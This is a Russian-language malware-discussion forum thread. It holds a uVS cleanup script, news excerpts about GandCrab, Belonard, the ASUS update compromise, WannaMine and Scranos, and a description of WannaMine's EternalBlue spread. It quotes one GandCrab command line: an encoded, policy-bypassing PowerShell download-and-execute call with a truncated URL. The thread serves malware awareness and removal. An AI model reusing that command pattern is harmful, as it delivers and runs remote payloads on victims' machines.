поговорить о uVS, Carberp, планете Земля

RSS
Обсуждаем Carberp всех модификаций :)


Цитата
;uVS v3.71 script [http://dsrt.dyndns.org]

zoo %SystemDrive%\DOCUMENTS AND SETTINGS\HOUSE\ГЛАВНОЕ МЕНЮ\ПРОГРАММЫ\АВТОЗАГРУЗКА\IGFXTRAY.EXE
bl 6D99C48BBD436116B78A04997D854F57 164352
delall %SystemDrive%\DOCUMENTS AND SETTINGS\HOUSE\ГЛАВНОЕ МЕНЮ\ПРОГРАММЫ\АВТОЗАГРУЗКА\IGFXTRAY.EXE
delall %SystemDrive%\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\ICQ\ICQNEWTAB\NEWTAB.HTML
regt 1
regt 2
regt 7
regt 18
deltmp
delnfr
restart
Изменено: Арвид - 22.11.2011 13:07:19
Правильно заданный вопрос - это уже половина ответа

Ответы

Цитата
RP55 RP55 написал:
http://www.tehnari.ru/f183/t262601/

C:\USERS\1\APPDATA\ROAMING\TEMPO\
юмористы.
или почему правая нога не знает, что чешет левая.
NSCPUCN MINER 32.EXE
кстати у меня сразу все нашлось в каталоге "подозрительные и вирусы", без добавления новых сигнатур для DOC001.EXE

http://www.tehnari.ru/f183/t262685/
Win32/Sality.NBA

Редкое животное по нонешним временам :)
Шифровальщики Петра I
https://topwar.ru/152671-shifrovalschiki-petra-i-chast-pervaja.html
Распространители GandCrab взяли на вооружение метод с командной строкой, содержащей powershell и закодированный в base64 код.

Цитата
cmdline:
powershell -exec bypass -nop -enc aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBl­AGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4A­ZwAoACcAaAB0AHQAcABzADoAL****

https://app.any.run/tasks/309138f6-4541-4bd5-93b4-dbf33f83af6e
Цитата
RP55 RP55 написал:
Шифровальщики Петра I
https://topwar.ru/152671-shifrovalschiki-petra-i-chast-pervaja.html

Цитата
Было у петровских криптографов собственное ноу-хау – наличие множества «пустышек» в тексте, то есть знаков шифрованного текста, которым не соответствует никакой знак открытого текста. Эти бессмысленные включения длиной 5-6 знаков увеличивали стойкость шифров, создавая у противника неправильное впечатление о количестве знаком в алфавите открытого текста. «Пустышки» разбивали структурные лингвистические связи открытого текста и изменяли статистические закономерности, то есть именно те свойства текста, которые использовались при дешифровании шифра простой замены. Бессмысленные вставки увеличивали длину кодированного текста по сравнению с открытым, а это значительно усложняло их взаимное сопоставление.

обфускация
https://habr.com/ru/post/255871/
Играя в видеоигры, большинство людей не беспокоятся о том, чтобы заразиться их игровым клиентом. Новое исследование, однако, показывает, что это именно то, что происходит, когда 39% всех существующих игровых серверов Counter-Strike 1.6 пытались заразить игроков через уязвимости в игровом клиенте.

Хотя Counter-Strike 1.6 уже почти 20 лет, по-прежнему существует сильная база игроков и рынок игровых серверов для игры. С учетом этого требования провайдеры хостинга арендуют игровые серверы ежемесячно и предлагают другие услуги, такие как продвижение игрового сервера клиента, чтобы повысить свою популярность.

В новом отчете Dr. Web исследователи объясняют, как разработчик использует уязвимости игровых клиентов, троян Belonard Trojan и вредоносные серверы для продвижения игровых серверов своих клиентов и привлечения большего числа жертв в ботнет. На своем пике этот ботнет стал настолько большим, что примерно 39% из 5000 серверов Counter-Strike 1.6 были вредоносными по своей природе и пытались заразить подключенных игроков.

https://www.bleepingcomputer.com/news/security/39-percent-of-all-counter-strike-16-servers-used-to-infect-players/

русский текст
https://xakep.ru/2019/03/13/belonard/
Цитата
Почти полмиллиона компьютеров оказались заражены...
Система обновлений компании ASUS Live Update была взломана.
распространяемый файл имел официальную цифровую подпись Asus, что и дало ему возможность не вызывать подозрения систем безопасности.
вирус просуществовал практически полгода, прежде чем был обнаружен. В результате он успел заразить около 500 тысяч ПК.

https://habr.com/ru/company/jetinfosystems/blog/445256/

И хороший коммент.

Цитата
dunaldo
25 марта 2019 в 21:31  +29

День подходил к концу, перед тем как закрыть крышку ноутбука и отправиться отдыхать, взгляд зацепился за несколько слов:«Киберпреступники… asus… update».
Открыл, прочел, легкая дрожь прошла по спине… Отточенным движением нажал win+R, ничего, еще раз, ничего, черт alt+F2, konsole, enter, ifconfi… легкий позатыльник и нежный голос жены:«Милый, какой asus update, твоему ноуту 9 лет и у тебя manjaro»…
«В этот раз повезло.»
Изменено: RP55 RP55 - 27.03.2019 13:45:30
актуальная тема "Уничтожить dllhostex.exe", спасибо Кузнецову Дмитрию (и uVS) за помощь в решение этой проблемы.

по этой эпидемии WannaMine4.0  обзор:

Цитата
Attack Procedure:

   The DLL file ApplicationNetBIOSClient.dll is corresponding to the service ApplicationNetBIOSClient and loaded through the executable svchost.exe. Every time it starts upon system startup, another executable spoolsv.exe is loaded.
   Then spoolsv.exe scans the local area network on port 445 to find target hosts and starts the vulnerability exploit program svchost.exe and spoolsv.exe. Svchost.exe performs EternalBlue butter overflow attacks against the hosts targeted in Step 2.
   Upon successful intrusion, spoolsv.exe (a NSA-linked exploit kit, DoublePulsar) installs backdoor and malicious payload (x86.dll/x64.dll).
   The payload (x86.dll/x64.dll) is executed to duplicate rdpkax.xsl from local host to target host, decompress the file, register ApplicationNetBIOSClient service and start spoolsv to perform attacks. Each host is infected in the above ways, step by step.


Цитата
Одно из отличий заключается в том, что оригинальный сжатый пакет заменен на rdpkax.xsl, набор эксплойтов, который содержит все компоненты для выполнения атак. Как и в предыдущей версии 3.0, этот вариант также использует методы уклонения от вирусов. rdpkax.xsl - это специальный пакет данных, для которого требуется, чтобы вариант расшифровывал себя и разделял его компоненты, включая набор эксплойтов EternalBlue (svchost.exe, spoolsv.exe, x86.dll / x64.dll и т. д.), которые хранятся в следующие каталоги:
C: \ Windows \ System32 \ rdpkax.xsl
C: \ Windows \ System32 \ dllhostex.exe
C: \ Windows \ System32 \ ApplicationNetBIOSClient.dll
C: \ Windows \ SysWOW64 \ ApplicationNetBIOSClient.dll
C: \ Windows \ SysWOW64 \ dllhostex.exe
C: \ Windows \ NetworkDistribution

https://www.sangfor.com/source/blog-network-security/1201.html

+
Хакер.ру о WannaMine

Цитата
В начале 2018 года многие ИБ-компании и независимые эксперты предупреждали о появлении майнингового ботнета, который использует зараженные хосты для добычи криптовалюты Monero. По данным специалистов, тогда было скомпрометировало от  500 000 до 1 000 000 машин, а операторы малвари «заработали» порядка 8900 Monero (около 2 млн долларов по курсу на тот момент).

Данная малварь получила название WannaMine, которое угрозе дали специалисты компании CrowdStrike. Разумеется, параллель с WannaCry неслучайна. Дело в том, что для распространения малварь использует эксплоиты EternalBlue (CVE-2017-0144) и EsteemAudit (CVE-2017-0176), направленные против уязвимых Windows-машин. Названия этих эксплоитов хорошо знакомы не только ИБ-специалистам, но даже рядовым пользователям, так как именно EternalBlue весной 2017 года применялся для распространения нашумевшего шифровальщика WannaCry.

https://xakep.ru/2018/09/17/wannamine-alive/
Вот зачем интересно.

https://www.virustotal.com/gui/file/adff56180957dde5a10016e9ff5dbb6cf02bc719e9f1277­e7f4c218dd39b974f/details

Действительна, подписано ISET Software LLC

Зачем ESET Стала ISET _ ?
Руткит Scranos вышел за пределы Китая и теперь распространяется по всему миру

В особой зоне риска находятся любители взломанного ПО.

Операторы многофункционального руткита Scranos расширили поле деятельности за границы Китая и теперь атакуют пользователей по всему миру. По данным специалистов компании Bitdefender, наибольшее число случаев инфицирования зафиксировано в Румынии, Франции, Италии, Индии, Бразилии и Индонезии.

Scranos сочетает в себе функции бэкдора, инфостилера и рекламного ПО и может работать на всех версиях Windows, включая «десятку». В основном вредонос распространяется через взломанное программное обеспечение, поэтому в особой зоне риска находятся пользователи, имеющие привычку загружать и устанавливать именно такое ПО. Заразив устройство, Scranos «укореняется» на системе и получает полный контроль над ней.


Подробнее: https://www.securitylab.ru/news/498814.php?R=1

Scranos: обнаружена новая быстро развивающаяся шпионская программа с поддержкой руткитов

Была обнаружена новая мощная шпионская программа с поддержкой руткитов, в которой хакеры распространяют многофункциональные вредоносные программы, замаскированные под взломанное или троянское приложение, выдавая себя за законное программное обеспечение, такое как видеоплееры, драйверы и даже антивирусные продукты.

Несмотря на то, что вредоносное ПО для руткитов, получившее название Scranos, которое было впервые обнаружено в конце прошлого года, все еще находится в стадии разработки, оно постоянно развивается, тестирует новые компоненты и регулярно совершенствует старые компоненты, что делает его значительной угрозой.

Scranos обладает модульным дизайном, который уже получил возможность похищать учетные данные для входа и платежные учетные записи из различных популярных сервисов, извлекать историю посещений и файлы cookie, получать подписчиков YouTube, показывать рекламу, а также загружать и выполнять любую полезную нагрузку.


https://thehackernews.com/2019/04/scranos-rootkit-spyware.html
Читают тему (гостей: 3)